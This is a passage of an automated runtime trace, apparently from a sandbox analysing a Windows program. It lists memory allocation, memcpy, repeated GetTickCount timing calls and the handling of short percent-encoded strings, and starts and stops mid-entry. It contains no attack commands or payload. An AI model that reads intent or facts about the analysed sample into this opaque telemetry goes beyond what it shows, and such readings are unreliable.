0x24ae139cfa0 [0101.908] realloc (_Block=0x24ae139dac0, _Size=0x40) returned 0x24ae1480960 [0101.909] realloc (_Block=0x24ae139cfa0, _Size=0x280) returned 0x24ae148dac0 [0101.909] malloc (_Size=0x508) returned 0x24ae1488860 [0101.910] GetTickCount () returned 0x210d76c [0101.910] realloc (_Block=0x24ae1480960, _Size=0x80) returned 0x24ae1482a80 [0101.910] GetTickCount () returned 0x210d76c [0101.911] realloc (_Block=0x24ae148dac0, _Size=0x500) returned 0x24ae1485fe0 [0101.911] GetTickCount () returned 0x210d76c [0101.911] malloc (_Size=0xa08) returned 0x24ae13af740 [0101.911] GetTickCount () returned 0x210d76c [0101.911] realloc (_Block=0x24ae1482a80, _Size=0x100) returned 0x24ae1474220 [0101.911] GetTickCount () returned 0x210d76c [0101.911] GetTickCount () returned 0x210d76c [0101.912] realloc (_Block=0x24ae1485fe0, _Size=0xa00) returned 0x24ae13b47c0 [0101.912] GetTickCount () returned 0x210d76c [0101.912] GetTickCount () returned 0x210d76c [0101.912] GetTickCount () returned 0x210d76c [0101.912] malloc (_Size=0x1408) returned 0x24ae13c5b90 [0101.913] GetTickCount () returned 0x210d76c [0101.913] realloc (_Block=0x24ae1474220, _Size=0x200) returned 0x24ae13ba210 [0101.913] GetTickCount () returned 0x210d76c [0101.914] GetTickCount () returned 0x210d76c [0101.914] GetTickCount () returned 0x210d76c [0101.914] realloc (_Block=0x24ae13b47c0, _Size=0x1400) returned 0x24ae139eed0 [0101.915] GetTickCount () returned 0x210d76c [0101.915] GetTickCount () returned 0x210d76c [0101.915] GetTickCount () returned 0x210d76c [0101.915] GetTickCount () returned 0x210d76c [0101.915] GetTickCount () returned 0x210d76c [0101.916] GetTickCount () returned 0x210d76c [0101.916] GetTickCount () returned 0x210d76c [0101.916] GetTickCount () returned 0x210d76c [0101.916] malloc (_Size=0x2808) returned 0x24ae13a02e0 [0101.916] GetTickCount () returned 0x210d76c [0101.919] GetTickCount () returned 0x210d76c [0101.922] GetTickCount () returned 0x210d76c [0101.926] GetTickCount () returned 0x210d77b [0101.930] GetTickCount () returned 0x210d77b [0101.932] GetTickCount () returned 0x210d77b [0101.935] GetTickCount () returned 0x210d77b [0101.938] GetTickCount () returned 0x210d77b [0101.942] GetTickCount () returned 0x210d78b [0101.944] GetTickCount () returned 0x210d78b [0101.946] GetTickCount () returned 0x210d78b [0101.949] GetTickCount () returned 0x210d78b [0101.950] GetTickCount () returned 0x210d78b [0101.951] malloc (_Size=0x28) returned 0x24ae139df40 [0101.951] malloc (_Size=0x28) returned 0x24ae139ddf0 [0101.951] malloc (_Size=0x28) returned 0x24ae139df70 [0101.952] memcpy (in: _Dst=0x24adf9becce, _Src=0x24adf9b7eb8, _Size=0x2 | out: _Dst=0x24adf9becce) returned 0x24adf9becce [0101.952] memcpy (in: _Dst=0x24adf9beccc, _Src=0x24adf9b7c78, _Size=0x2 | out: _Dst=0x24adf9beccc) returned 0x24adf9beccc [0101.952] memcpy (in: _Dst=0x24adf9becca, _Src=0x24adf9b7c58, _Size=0x2 | out: _Dst=0x24adf9becca) returned 0x24adf9becca [0101.952] memcpy (in: _Dst=0x24adf9becc8, _Src=0x24adf9b8098, _Size=0x2 | out: _Dst=0x24adf9becc8) returned 0x24adf9becc8 [0101.952] free (_Block=0x24ae139df70) [0101.952] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ü", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.952] memcpy (in: _Dst=0x24adf9b7cb8, _Src=0xd6788fbb30, _Size=0x4 | out: _Dst=0x24adf9b7cb8) returned 0x24adf9b7cb8 [0101.952] malloc (_Size=0x28) returned 0x24ae139dfd0 [0101.952] GetTickCount () returned 0x210d78b [0101.953] memcpy (in: _Dst=0x24adf9a5f6c, _Src=0x24ae1a0f83c, _Size=0x14 | out: _Dst=0x24adf9a5f6c) returned 0x24adf9a5f6c [0101.953] memcpy (in: _Dst=0x24adf9a5f68, _Src=0x24adf9b7cb8, _Size=0x4 | out: _Dst=0x24adf9a5f68) returned 0x24adf9a5f68 [0101.953] free (_Block=0x24ae139dfd0) [0101.953] malloc (_Size=0x70) returned 0x24ae146ff20 [0101.954] malloc (_Size=0x28) returned 0x24ae139e000 [0101.954] malloc (_Size=0x28) returned 0x24ae139df70 [0101.954] malloc (_Size=0x28) returned 0x24ae139d9d0 [0101.954] GetTickCount () returned 0x210d78b [0101.954] malloc (_Size=0x28) returned 0x24ae139da90 [0101.955] malloc (_Size=0x28) returned 0x24ae139df10 [0101.955] memcpy (in: _Dst=0x24adf9be9a2, _Src=0x24adf9b80b8, _Size=0x2 | out: _Dst=0x24adf9be9a2) returned 0x24adf9be9a2 [0101.955] memcpy (in: _Dst=0x24adf9be9a0, _Src=0x24adf9b7fb8, _Size=0x2 | out: _Dst=0x24adf9be9a0) returned 0x24adf9be9a0 [0101.955] memcpy (in: _Dst=0x24adf9be99e, _Src=0x24adf9b7f98, _Size=0x2 | out: _Dst=0x24adf9be99e) returned 0x24adf9be99e [0101.955] memcpy (in: _Dst=0x24adf9be99c, _Src=0x24adf9b7f58, _Size=0x2 | out: _Dst=0x24adf9be99c) returned 0x24adf9be99c [0101.955] memcpy (in: _Dst=0x24adf9be99a, _Src=0x24adf9b7f38, _Size=0x2 | out: _Dst=0x24adf9be99a) returned 0x24adf9be99a [0101.955] memcpy (in: _Dst=0x24adf9be998, _Src=0x24adf9b7ef8, _Size=0x2 | out: _Dst=0x24adf9be998) returned 0x24adf9be998 [0101.955] free (_Block=0x24ae139df10) [0101.956] memcpy (in: _Dst=0x24adf9b80d8, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b80d8) returned 0x24adf9b80d8 [0101.957] malloc (_Size=0x28) returned 0x24ae139dc10 [0101.957] memcpy (in: _Dst=0x24adf9be9fc, _Src=0x24adf9b80d8, _Size=0x4 | out: _Dst=0x24adf9be9fc) returned 0x24adf9be9fc [0101.957] memcpy (in: _Dst=0x24adf9be9f8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9be9f8) returned 0x24adf9be9f8 [0101.958] free (_Block=0x24ae139dc10) [0101.958] memcpy (in: _Dst=0x24adf9b9748, _Src=0x24adf9be9fc, _Size=0x4 | out: _Dst=0x24adf9b9748) returned 0x24adf9b9748 [0101.958] malloc (_Size=0x28) returned 0x24ae139dd60 [0101.958] memcpy (in: _Dst=0x24adf9b9668, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b9668) returned 0x24adf9b9668 [0101.958] malloc (_Size=0x28) returned 0x24ae139da30 [0101.958] memcpy (in: _Dst=0x24adf9beb1c, _Src=0x24adf9b9668, _Size=0x4 | out: _Dst=0x24adf9beb1c) returned 0x24adf9beb1c [0101.958] memcpy (in: _Dst=0x24adf9beb18, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9beb18) returned 0x24adf9beb18 [0101.959] free (_Block=0x24ae139da30) [0101.959] malloc (_Size=0x28) returned 0x24ae139e0c0 [0101.959] malloc (_Size=0x28) returned 0x24ae139dd90 [0101.959] GetTickCount () returned 0x210d79b [0101.959] malloc (_Size=0x28) returned 0x24ae139e060 [0101.959] GetTickCount () returned 0x210d79b [0101.960] free (_Block=0x24ae139e060) [0101.960] GetTickCount () returned 0x210d79b [0101.960] malloc (_Size=0x28) returned 0x24ae139df10 [0101.960] GetTickCount () returned 0x210d79b [0101.960] malloc (_Size=0x28) returned 0x24ae139dc40 [0101.960] GetTickCount () returned 0x210d79b [0101.960] GetTickCount () returned 0x210d79b [0101.960] GetTickCount () returned 0x210d79b [0101.960] malloc (_Size=0x28) returned 0x24ae139da30 [0101.960] GetTickCount () returned 0x210d79b [0101.961] free (_Block=0x24ae139da30) [0101.961] GetTickCount () returned 0x210d79b [0101.961] malloc (_Size=0x28) returned 0x24ae139e060 [0101.961] GetTickCount () returned 0x210d79b [0101.961] malloc (_Size=0x28) returned 0x24ae139ddc0 [0101.961] GetTickCount () returned 0x210d79b [0101.961] GetTickCount () returned 0x210d79b [0101.961] GetTickCount () returned 0x210d79b [0101.961] malloc (_Size=0x28) returned 0x24ae139dc70 [0101.961] GetTickCount () returned 0x210d79b [0101.962] free (_Block=0x24ae139dc70) [0101.962] GetTickCount () returned 0x210d79b [0101.962] malloc (_Size=0x28) returned 0x24ae139dbe0 [0101.962] GetTickCount () returned 0x210d79b [0101.962] malloc (_Size=0x28) returned 0x24ae139dc10 [0101.962] GetTickCount () returned 0x210d79b [0101.963] GetTickCount () returned 0x210d79b [0101.963] GetTickCount () returned 0x210d79b [0101.963] malloc (_Size=0x28) returned 0x24ae139e090 [0101.963] GetTickCount () returned 0x210d79b [0101.964] free (_Block=0x24ae139e090) [0101.964] GetTickCount () returned 0x210d79b [0101.964] malloc (_Size=0x28) returned 0x24ae139dc70 [0101.964] GetTickCount () returned 0x210d79b [0101.964] malloc (_Size=0x28) returned 0x24ae139da30 [0101.964] GetTickCount () returned 0x210d79b [0101.965] free (_Block=0x24ae139da30) [0101.965] SysStringLen (param_1="%c2%98%4f%c2%b9%1f") returned 0x12 [0101.965] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1484b90 [0101.965] free (_Block=0x24ae1484b90) [0101.965] malloc (_Size=0x2e0) returned 0x24ae13906b0 [0101.965] GetTickCount () returned 0x210d79b [0101.965] malloc (_Size=0x20) returned 0x24ae139de20 [0101.965] malloc (_Size=0x288) returned 0x24ae148d080 [0101.965] realloc (_Block=0x0, _Size=0x140) returned 0x24ae139d240 [0101.965] GetTickCount () returned 0x210d79b [0101.965] realloc (_Block=0x24ae139de20, _Size=0x40) returned 0x24ae14807d0 [0101.965] realloc (_Block=0x24ae139d240, _Size=0x280) returned 0x24ae148dac0 [0101.965] GetTickCount () returned 0x210d79b [0101.966] malloc (_Size=0x508) returned 0x24ae1487e40 [0101.966] realloc (_Block=0x24ae14807d0, _Size=0x80) returned 0x24ae1482570 [0101.966] GetTickCount () returned 0x210d79b [0101.966] realloc (_Block=0x24ae148dac0, _Size=0x500) returned 0x24ae1489280 [0101.966] GetTickCount () returned 0x210d79b [0101.966] GetTickCount () returned 0x210d79b [0101.966] malloc (_Size=0xa08) returned 0x24ae13b0150 [0101.966] realloc (_Block=0x24ae1482570, _Size=0x100) returned 0x24ae1473450 [0101.966] GetTickCount () returned 0x210d79b [0101.966] GetTickCount () returned 0x210d79b [0101.966] realloc (_Block=0x24ae1489280, _Size=0xa00) returned 0x24ae13b33a0 [0101.966] GetTickCount () returned 0x210d79b [0101.966] GetTickCount () returned 0x210d79b [0101.966] GetTickCount () returned 0x210d79b [0101.966] GetTickCount () returned 0x210d79b [0101.966] malloc (_Size=0x1408) returned 0x24ae13a2af0 [0101.967] realloc (_Block=0x24ae1473450, _Size=0x200) returned 0x24ae13b9be0 [0101.967] GetTickCount () returned 0x210d79b [0101.967] GetTickCount () returned 0x210d79b [0101.967] GetTickCount () returned 0x210d79b [0101.967] realloc (_Block=0x24ae13b33a0, _Size=0x1400) returned 0x24ae13bab20 [0101.967] GetTickCount () returned 0x210d79b [0101.967] GetTickCount () returned 0x210d79b [0101.968] GetTickCount () returned 0x210d79b [0101.968] GetTickCount () returned 0x210d79b [0101.968] GetTickCount () returned 0x210d79b [0101.968] GetTickCount () returned 0x210d79b [0101.968] GetTickCount () returned 0x210d79b [0101.968] GetTickCount () returned 0x210d79b [0101.968] GetTickCount () returned 0x210d79b [0101.968] malloc (_Size=0x2808) returned 0x24ae13bbf30 [0101.968] GetTickCount () returned 0x210d79b [0101.971] GetTickCount () returned 0x210d79b [0101.973] GetTickCount () returned 0x210d7aa [0101.976] GetTickCount () returned 0x210d7aa [0101.978] GetTickCount () returned 0x210d7aa [0101.980] GetTickCount () returned 0x210d7aa [0101.982] GetTickCount () returned 0x210d7aa [0101.984] GetTickCount () returned 0x210d7aa [0101.985] GetTickCount () returned 0x210d7aa [0101.992] GetTickCount () returned 0x210d7ba [0101.995] GetTickCount () returned 0x210d7ba [0101.997] GetTickCount () returned 0x210d7ba [0101.999] malloc (_Size=0x28) returned 0x24ae139de20 [0101.999] GetTickCount () returned 0x210d7ba [0102.000] malloc (_Size=0x28) returned 0x24ae139da30 [0102.000] GetTickCount () returned 0x210d7ba [0102.000] malloc (_Size=0x28) returned 0x24ae139de50 [0102.000] GetTickCount () returned 0x210d7ba [0102.000] memcpy (in: _Dst=0x24adf9bf3ee, _Src=0x24adf9b9688, _Size=0x2 | out: _Dst=0x24adf9bf3ee) returned 0x24adf9bf3ee [0102.000] memcpy (in: _Dst=0x24adf9bf3ec, _Src=0x24adf9b98a8, _Size=0x2 | out: _Dst=0x24adf9bf3ec) returned 0x24adf9bf3ec [0102.000] memcpy (in: _Dst=0x24adf9bf3ea, _Src=0x24adf9b9b48, _Size=0x2 | out: _Dst=0x24adf9bf3ea) returned 0x24adf9bf3ea [0102.000] memcpy (in: _Dst=0x24adf9bf3e8, _Src=0x24adf9b97c8, _Size=0x2 | out: _Dst=0x24adf9bf3e8) returned 0x24adf9bf3e8 [0102.001] free (_Block=0x24ae139de50) [0102.001] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ë", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.001] GetTickCount () returned 0x210d7ba [0102.001] memcpy (in: _Dst=0x24adf9b99a8, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9b99a8) returned 0x24adf9b99a8 [0102.001] malloc (_Size=0x28) returned 0x24ae139dca0 [0102.001] GetTickCount () returned 0x210d7ba [0102.001] memcpy (in: _Dst=0x24adf9a5f2e, _Src=0x24ae1a0f83c, _Size=0x14 | out: _Dst=0x24adf9a5f2e) returned 0x24adf9a5f2e [0102.001] memcpy (in: _Dst=0x24adf9a5f28, _Src=0x24adf9b99a8, _Size=0x6 | out: _Dst=0x24adf9a5f28) returned 0x24adf9a5f28 [0102.002] free (_Block=0x24ae139dca0) [0102.002] malloc (_Size=0x28) returned 0x24ae139db20 [0102.003] GetTickCount () returned 0x210d7ca [0102.003] malloc (_Size=0x28) returned 0x24ae139d9a0 [0102.003] GetTickCount () returned 0x210d7ca [0102.003] malloc (_Size=0x28) returned 0x24ae139dca0 [0102.004] GetTickCount () returned 0x210d7ca [0102.004] memcpy (in: _Dst=0x24adf9bf0ee, _Src=0x24adf9b9608, _Size=0x2 | out: _Dst=0x24adf9bf0ee) returned 0x24adf9bf0ee [0102.004] memcpy (in: _Dst=0x24adf9bf0ec, _Src=0x24adf9b97e8, _Size=0x2 | out: _Dst=0x24adf9bf0ec) returned 0x24adf9bf0ec [0102.004] memcpy (in: _Dst=0x24adf9bf0ea, _Src=0x24adf9b9ba8, _Size=0x2 | out: _Dst=0x24adf9bf0ea) returned 0x24adf9bf0ea [0102.004] memcpy (in: _Dst=0x24adf9bf0e8, _Src=0x24adf9b9808, _Size=0x2 | out: _Dst=0x24adf9bf0e8) returned 0x24adf9bf0e8 [0102.004] free (_Block=0x24ae139dca0) [0102.004] GetTickCount () returned 0x210d7ca [0102.004] GetTickCount () returned 0x210d7ca [0102.004] memcpy (in: _Dst=0x24adf9b98c8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b98c8) returned 0x24adf9b98c8 [0102.005] malloc (_Size=0x28) returned 0x24ae139dac0 [0102.005] GetTickCount () returned 0x210d7ca [0102.005] memcpy (in: _Dst=0x24adf9bf29c, _Src=0x24adf9b98c8, _Size=0x4 | out: _Dst=0x24adf9bf29c) returned 0x24adf9bf29c [0102.005] memcpy (in: _Dst=0x24adf9bf298, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bf298) returned 0x24adf9bf298 [0102.005] free (_Block=0x24ae139dac0) [0102.005] GetTickCount () returned 0x210d7ca [0102.005] memcpy (in: _Dst=0x24adf9b9a08, _Src=0x24adf9bf29c, _Size=0x4 | out: _Dst=0x24adf9b9a08) returned 0x24adf9b9a08 [0102.006] malloc (_Size=0x28) returned 0x24ae139dca0 [0102.006] GetTickCount () returned 0x210d7ca [0102.006] GetTickCount () returned 0x210d7ca [0102.006] GetTickCount () returned 0x210d7ca [0102.006] memcpy (in: _Dst=0x24adf9b9828, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b9828) returned 0x24adf9b9828 [0102.006] malloc (_Size=0x28) returned 0x24ae139de50 [0102.006] GetTickCount () returned 0x210d7ca [0102.006] memcpy (in: _Dst=0x24adf9bf32c, _Src=0x24adf9b9828, _Size=0x4 | out: _Dst=0x24adf9bf32c) returned 0x24adf9bf32c [0102.006] memcpy (in: _Dst=0x24adf9bf328, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bf328) returned 0x24adf9bf328 [0102.007] free (_Block=0x24ae139de50) [0102.007] GetTickCount () returned 0x210d7ca [0102.007] memcpy (in: _Dst=0x24adf9b9b68, _Src=0x24adf9bf32c, _Size=0x4 | out: _Dst=0x24adf9b9b68) returned 0x24adf9b9b68 [0102.007] malloc (_Size=0x28) returned 0x24ae139da60 [0102.007] GetTickCount () returned 0x210d7ca [0102.007] malloc (_Size=0x28) returned 0x24ae139de50 [0102.008] GetTickCount () returned 0x210d7ca [0102.008] GetTickCount () returned 0x210d7ca [0102.008] GetTickCount () returned 0x210d7ca [0102.008] memcpy (in: _Dst=0x24adf9b9b88, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b9b88) returned 0x24adf9b9b88 [0102.008] malloc (_Size=0x28) returned 0x24ae139dd30 [0102.008] GetTickCount () returned 0x210d7ca [0102.008] memcpy (in: _Dst=0x24adf9bf3bc, _Src=0x24adf9b9b88, _Size=0x4 | out: _Dst=0x24adf9bf3bc) returned 0x24adf9bf3bc [0102.008] memcpy (in: _Dst=0x24adf9bf3b8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bf3b8) returned 0x24adf9bf3b8 [0102.009] free (_Block=0x24ae139dd30) [0102.009] GetTickCount () returned 0x210d7ca [0102.009] memcpy (in: _Dst=0x24adf9b98e8, _Src=0x24adf9bf3bc, _Size=0x4 | out: _Dst=0x24adf9b98e8) returned 0x24adf9b98e8 [0102.009] malloc (_Size=0x28) returned 0x24ae139e090 [0102.009] GetTickCount () returned 0x210d7ca [0102.009] malloc (_Size=0x28) returned 0x24ae139dfa0 [0102.010] GetTickCount () returned 0x210d7ca [0102.010] GetTickCount () returned 0x210d7ca [0102.010] GetTickCount () returned 0x210d7ca [0102.010] memcpy (in: _Dst=0x24adf9b96c8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b96c8) returned 0x24adf9b96c8 [0102.010] malloc (_Size=0x28) returned 0x24ae139e0f0 [0102.010] GetTickCount () returned 0x210d7ca [0102.010] memcpy (in: _Dst=0x24adf9bf2cc, _Src=0x24adf9b96c8, _Size=0x4 | out: _Dst=0x24adf9bf2cc) returned 0x24adf9bf2cc [0102.010] memcpy (in: _Dst=0x24adf9bf2c8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bf2c8) returned 0x24adf9bf2c8 [0102.011] free (_Block=0x24ae139e0f0) [0102.011] GetTickCount () returned 0x210d7ca [0102.011] memcpy (in: _Dst=0x24adf9b9a28, _Src=0x24adf9bf2cc, _Size=0x4 | out: _Dst=0x24adf9b9a28) returned 0x24adf9b9a28 [0102.011] malloc (_Size=0x28) returned 0x24ae139dac0 [0102.011] GetTickCount () returned 0x210d7ca [0102.011] malloc (_Size=0x28) returned 0x24ae139db50 [0102.012] GetTickCount () returned 0x210d7ca [0102.012] memcpy (in: _Dst=0x24adf9a5abc, _Src=0x24adf9b9a28, _Size=0x4 | out: _Dst=0x24adf9a5abc) returned 0x24adf9a5abc [0102.012] memcpy (in: _Dst=0x24adf9a5aba, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5aba) returned 0x24adf9a5aba [0102.012] memcpy (in: _Dst=0x24adf9a5ab6, _Src=0x24adf9b98e8, _Size=0x4 | out: _Dst=0x24adf9a5ab6) returned 0x24adf9a5ab6 [0102.012] memcpy (in: _Dst=0x24adf9a5ab4, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5ab4) returned 0x24adf9a5ab4 [0102.012] memcpy (in: _Dst=0x24adf9a5ab0, _Src=0x24adf9b9b68, _Size=0x4 | out: _Dst=0x24adf9a5ab0) returned 0x24adf9a5ab0 [0102.012] memcpy (in: _Dst=0x24adf9a5aae, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5aae) returned 0x24adf9a5aae [0102.012] memcpy (in: _Dst=0x24adf9a5aaa, _Src=0x24adf9b9a08, _Size=0x4 | out: _Dst=0x24adf9a5aaa) returned 0x24adf9a5aaa [0102.012] memcpy (in: _Dst=0x24adf9a5aa8, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5aa8) returned 0x24adf9a5aa8 [0102.013] free (_Block=0x24ae139db50) [0102.013] SysStringLen (param_1="%63%74%64%48") returned 0xc [0102.013] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1484780 [0102.013] memcpy (in: _Dst=0x24adf9bf148, _Src=0x24ae1484780, _Size=0x8 | out: _Dst=0x24adf9bf148) returned 0x24adf9bf148 [0102.013] free (_Block=0x24ae1484780) [0102.013] malloc (_Size=0x70) returned 0x24ae14705a0 [0102.013] GetTickCount () returned 0x210d7ca [0102.014] GetTickCount () returned 0x210d7ca [0102.014] memcpy (in: _Dst=0x24adf9b9568, _Src=0xd6788fbb30, _Size=0x2 | out: _Dst=0x24adf9b9568) returned 0x24adf9b9568 [0102.014] malloc (_Size=0x28) returned 0x24ae139e0f0 [0102.014] GetTickCount () returned 0x210d7ca [0102.014] memcpy (in: _Dst=0x24adf9bf1aa, _Src=0x24ae1a0f85c, _Size=0x14 | out: _Dst=0x24adf9bf1aa) returned 0x24adf9bf1aa [0102.014] memcpy (in: _Dst=0x24adf9bf1a8, _Src=0x24adf9b9568, _Size=0x2 | out: _Dst=0x24adf9bf1a8) returned 0x24adf9bf1a8 [0102.015] free (_Block=0x24ae139e0f0) [0102.015] malloc (_Size=0x28) returned 0x24ae139db80 [0102.016] GetTickCount () returned 0x210d7ca [0102.016] malloc (_Size=0x28) returned 0x24ae139dfd0 [0102.016] GetTickCount () returned 0x210d7ca [0102.016] malloc (_Size=0x28) returned 0x24ae139e0f0 [0102.017] GetTickCount () returned 0x210d7ca [0102.017] GetTickCount () returned 0x210d7ca [0102.017] malloc (_Size=0x28) returned 0x24ae139db50 [0102.017] GetTickCount () returned 0x210d7ca [0102.017] memcpy (in: _Dst=0x24adf9bd000, _Src=0x24adf9b9508, _Size=0x2 | out: _Dst=0x24adf9bd000) returned 0x24adf9bd000 [0102.017] memcpy (in: _Dst=0x24adf9bcffe, _Src=0x24adf9b9728, _Size=0x2 | out: _Dst=0x24adf9bcffe) returned 0x24adf9bcffe [0102.017] memcpy (in: _Dst=0x24adf9bcffc, _Src=0x24adf9b94e8, _Size=0x2 | out: _Dst=0x24adf9bcffc) returned 0x24adf9bcffc [0102.018] memcpy (in: _Dst=0x24adf9bcffa, _Src=0x24adf9b9848, _Size=0x2 | out: _Dst=0x24adf9bcffa) returned 0x24adf9bcffa [0102.018] memcpy (in: _Dst=0x24adf9bcff8, _Src=0x24adf9b9488, _Size=0x2 | out: _Dst=0x24adf9bcff8) returned 0x24adf9bcff8 [0102.018] free (_Block=0x24ae139db50) [0102.018] GetTickCount () returned 0x210d7ca [0102.018] GetTickCount () returned 0x210d7ca [0102.019] memcpy (in: _Dst=0x24adf9b9ae8, _Src=0xd6788fa660, _Size=0x2 | out: _Dst=0x24adf9b9ae8) returned 0x24adf9b9ae8 [0102.019] malloc (_Size=0x28) returned 0x24ae139d970 [0102.020] GetTickCount () returned 0x210d7d9 [0102.020] memcpy (in: _Dst=0x24adf9b958c, _Src=0x24adf9b9ae8, _Size=0x2 | out: _Dst=0x24adf9b958c) returned 0x24adf9b958c [0102.020] memcpy (in: _Dst=0x24adf9b9588, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9588) returned 0x24adf9b9588 [0102.021] free (_Block=0x24ae139d970) [0102.021] GetTickCount () returned 0x210d7d9 [0102.021] memcpy (in: _Dst=0x24adf9b9868, _Src=0x24adf9b958a, _Size=0x4 | out: _Dst=0x24adf9b9868) returned 0x24adf9b9868 [0102.021] malloc (_Size=0x28) returned 0x24ae139db50 [0102.021] GetTickCount () returned 0x210d7d9 [0102.021] GetTickCount () returned 0x210d7d9 [0102.021] GetTickCount () returned 0x210d7d9 [0102.022] memcpy (in: _Dst=0x24adf9b95c8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b95c8) returned 0x24adf9b95c8 [0102.022] malloc (_Size=0x28) returned 0x24ae139dcd0 [0102.022] GetTickCount () returned 0x210d7d9 [0102.022] memcpy (in: _Dst=0x24adf9bcdec, _Src=0x24adf9b95c8, _Size=0x4 | out: _Dst=0x24adf9bcdec) returned 0x24adf9bcdec [0102.022] memcpy (in: _Dst=0x24adf9bcde8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bcde8) returned 0x24adf9bcde8 [0102.023] free (_Block=0x24ae139dcd0) [0102.023] GetTickCount () returned 0x210d7d9 [0102.023] memcpy (in: _Dst=0x24adf9b9768, _Src=0x24adf9bcdec, _Size=0x4 | out: _Dst=0x24adf9b9768) returned 0x24adf9b9768 [0102.023] malloc (_Size=0x28) returned 0x24ae139dcd0 [0102.023] GetTickCount () returned 0x210d7d9 [0102.023] malloc (_Size=0x28) returned 0x24ae139dd00 [0102.024] GetTickCount () returned 0x210d7d9 [0102.024] GetTickCount () returned 0x210d7d9 [0102.024] GetTickCount () returned 0x210d7d9 [0102.024] memcpy (in: _Dst=0x24adf9b95a8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b95a8) returned 0x24adf9b95a8 [0102.024] malloc (_Size=0x28) returned 0x24ae139d970 [0102.024] GetTickCount () returned 0x210d7d9 [0102.024] memcpy (in: _Dst=0x24adf9bd1dc, _Src=0x24adf9b95a8, _Size=0x4 | out: _Dst=0x24adf9bd1dc) returned 0x24adf9bd1dc [0102.024] memcpy (in: _Dst=0x24adf9bd1d8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bd1d8) returned 0x24adf9bd1d8 [0102.025] free (_Block=0x24ae139d970) [0102.025] GetTickCount () returned 0x210d7d9 [0102.025] memcpy (in: _Dst=0x24adf9b9788, _Src=0x24adf9bd1dc, _Size=0x4 | out: _Dst=0x24adf9b9788) returned 0x24adf9b9788 [0102.025] malloc (_Size=0x28) returned 0x24ae139d970 [0102.026] GetTickCount () returned 0x210d7d9 [0102.026] malloc (_Size=0x28) returned 0x24ae139dd30 [0102.026] GetTickCount () returned 0x210d7d9 [0102.026] GetTickCount () returned 0x210d7d9 [0102.026] GetTickCount () returned 0x210d7d9 [0102.026] memcpy (in: _Dst=0x24adf9b9a88, _Src=0xd6788fa660, _Size=0x2 | out: _Dst=0x24adf9b9a88) returned 0x24adf9b9a88 [0102.026] malloc (_Size=0x28) returned 0x24ae139de80 [0102.026] GetTickCount () returned 0x210d7d9 [0102.027] memcpy (in: _Dst=0x24adf9b9aac, _Src=0x24adf9b9a88, _Size=0x2 | out: _Dst=0x24adf9b9aac) returned 0x24adf9b9aac [0102.027] memcpy (in: _Dst=0x24adf9b9aa8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9aa8) returned 0x24adf9b9aa8 [0102.027] free (_Block=0x24ae139de80) [0102.027] GetTickCount () returned 0x210d7d9 [0102.028] memcpy (in: _Dst=0x24adf9b9928, _Src=0x24adf9b9aaa, _Size=0x4 | out: _Dst=0x24adf9b9928) returned 0x24adf9b9928 [0102.028] malloc (_Size=0x28) returned 0x24ae139deb0 [0102.028] GetTickCount () returned 0x210d7d9 [0102.028] malloc (_Size=0x28) returned 0x24ae139de80 [0102.028] GetTickCount () returned 0x210d7d9 [0102.028] GetTickCount () returned 0x210d7d9 [0102.028] GetTickCount () returned 0x210d7d9 [0102.028] memcpy (in: _Dst=0x24adf9b9948, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b9948) returned 0x24adf9b9948 [0102.028] malloc (_Size=0x28) returned 0x24ae139dee0 [0102.028] GetTickCount () returned 0x210d7d9 [0102.029] memcpy (in: _Dst=0x24adf9bd26c, _Src=0x24adf9b9948, _Size=0x4 | out: _Dst=0x24adf9bd26c) returned 0x24adf9bd26c [0102.029] memcpy (in: _Dst=0x24adf9bd268, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bd268) returned 0x24adf9bd268 [0102.029] free (_Block=0x24ae139dee0) [0102.030] GetTickCount () returned 0x210d7d9 [0102.030] memcpy (in: _Dst=0x24adf9b9ac8, _Src=0x24adf9bd26c, _Size=0x4 | out: _Dst=0x24adf9b9ac8) returned 0x24adf9b9ac8 [0102.030] malloc (_Size=0x28) returned 0x24ae139dee0 [0102.030] GetTickCount () returned 0x210d7d9 [0102.030] malloc (_Size=0x28) returned 0x24ae148c020 [0102.030] GetTickCount () returned 0x210d7d9 [0102.030] memcpy (in: _Dst=0x24adf9a5fc2, _Src=0x24adf9b9ac8, _Size=0x4 | out: _Dst=0x24adf9a5fc2) returned 0x24adf9a5fc2 [0102.030] memcpy (in: _Dst=0x24adf9a5fc0, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5fc0) returned 0x24adf9a5fc0 [0102.031] memcpy (in: _Dst=0x24adf9a5fbc, 